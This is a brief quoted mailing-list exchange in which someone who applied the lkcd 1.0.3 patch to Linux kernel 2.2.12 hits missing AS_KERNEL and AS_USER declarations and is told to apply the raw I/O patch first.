>> >|>> I applied the patch for the lkcd 1.0.3. to the linux kernel version 2.2.12 but i faced the problem that it was not able to find the declarations of AS_KERNEL, AS_USER, AS_REMOTE etc. I am attaching the file for reference.
>> >|>
>> >|>You have to apply the raw I/O patch (sgi+straw2.2.13.patch) *before*
>> >|>the lkcd patch.
>> >|>
>> >
>> >